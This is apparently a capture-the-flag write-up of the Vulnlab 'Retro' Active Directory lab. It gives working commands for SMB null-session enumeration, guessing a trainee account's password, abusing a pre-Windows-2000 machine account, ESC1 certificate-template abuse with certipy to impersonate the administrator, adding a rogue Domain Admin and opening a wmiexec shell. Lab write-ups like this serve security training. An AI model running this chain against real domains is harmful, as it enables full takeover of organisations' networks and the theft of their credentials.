VL-Retro

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-10 21:02:43Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory 
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory 
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-03-10T21:03:27+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-09T21:01:16
| Not valid after:  2025-09-08T21:01:16
| MD5:   57df:2f2a:42f8:12ba:1acb:785c:ad91:ac2b
| SHA-1: 6a2d:a6d3:9d5e:38a0:ebd7:8775:5f7f:1659:3733:78eb

Host script results:
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48062/tcp): CLEAN (Timeout)
|   Check 2 (port 9402/tcp): CLEAN (Timeout)
|   Check 3 (port 6737/udp): CLEAN (Timeout)
|   Check 4 (port 6198/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-03-10T21:03:28
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

SMB

As there is not much exposed on the machine first we will try smb null session

1
smbclient -L //10.10.98.48 -N

SMB-Nullses
We can see that we can use null session and there is a Trainees share that looks interesting

1
smbclient //10.10.98.48/Trainees -N

Inside the share there is a Important.txt file we will get it to our machine with the below command

1
get Important.txt

Opening that file we see the following:

1
2
3
4
5
6
7
8
9
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

Now we will start searching for that account and try to brute force the password, we can use impacket-lookupsid to get some valid usernames as we have access to the null session.

1
impacket-lookupsid guest@10.10.98.48 -no-pass

lookupsid
The account that the trainees use is called trainee (we could have guessed it but ok)

After spraying it with some common password we tried to put the username as the password and it worked
trainee-smb
Also we can see that now we have read access to the Notes share

1
smbclient //10.10.98.48/Notes -U "trainee"

And we download the file named ToDo.txt

1
get ToDo.txt
1
2
3
4
5
6
7
8
9
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

After reading the ToDo.txt i started digging around for some info on old computer accounts and how they were created, and i found in an article the following

Note : In older Active Directories, it is possible to find accounts marked as “Assign this computer account as a pre-Windows 2000.” The password for these machine accounts is the lowercase name of the machine account itself. For example, the password for the machine account “XMCO$” would be “xmco”.

https://www.xmco.fr/en/active-directory-en/part-5-machine-accounts-in-the-active-directory/

Bloodhound

I used bloodhound python to get a better understanding of the domain

1
bloodhound-python -u "trainee" -p "trainee" -d retro.vl -dc DC.retro.vl -ns 10.10.98.48 --zip

Using the below query we can see there are 2 machines:

1
MATCH (n:Computer) RETURN n

mchine-accounts
We will try to use the machine account name Banking$ with the password banking

1
netexec smb 10.10.98.48 -u 'Banking$' -p banking

The error that we get is STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT this can be fixed by changing password for the machine account.

1
impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.98.48 -newpass StrongP@ss1234 -dc-ip 10.10.98.48 -p rpc-samr

AD CS

Running certipy to find any templates that may be vulnurable:

1
certipy find -u 'banking$'@retro.vl -p StrongP@ss1234 -dc-ip 10.10.98.48

After opening the text file we see that one template is vulnerable to ESC1 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

We can exploit ESC1 we will use the below command

1
certipy req -u "banking$" -p "StrongP@ss1234" -target retro.vl -upn administrator@retro.vl -ca retro-DC-CA -template RetroClients

ESC01-Certipy
It fails with CERTSRV_E_KEY_LENGTH looking into it we find this article https://www.gradenegger.eu/en/the-request-for-certificates-via-the-network-device-registration-service-ndes-fails-with-the-error-message-the-public-key-does-not-meet-the-minimum-size-required-by-the-specified-cer/

That states:

This error occurs if the key length in the certificate request is less than configured in the certificate template configured for the NDES server. Thus, either the “Minimum Key Length” in the certificate template must be reduced, or a new certificate request with a sufficiently large key must be formed and sent to the NDES server.

Looking back at the certipy output we see that tamplate requires a minimum RSA key of 4096 Bytes

1
certipy req -u 'BANKING$'@retro.vl -p "StrongP@ss1234" -dc-ip 10.10.98.48 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096

First way

Now that we have the administrator.pfx we will spawn an ldap shell and create a new user and add him to Domain Admins

1
certipy auth -pfx administrator.pfx -dc-ip 192.168.0.100 -ldap-shell
1
2
add_user EvilAdmin  
add_user_to_group EvilAdmin 'Domain Admins'

Second way

We will get a valid TGT as administrator

1
certipy auth -pfx administrator.pfx -dc-ip 10.10.98.48

Using that hash to get a shell

1
KRB5CCNAME=administrator.ccache impacket-wmiexec -k -no-pass -dc-ip 10.10.98.48 retro.vl/administrator@DC.retro.vl

Using impacket-wmiexec we can get a shell and grab our flags

1
impacket-wmiexec EvilAdmin:'l0KHCK8F0Y?<&_T'@10.10.98.48

https://api.vulnlab.com/api/v1/share?id=ddf64ae9-fcad-498e-84ef-89aa99b6a242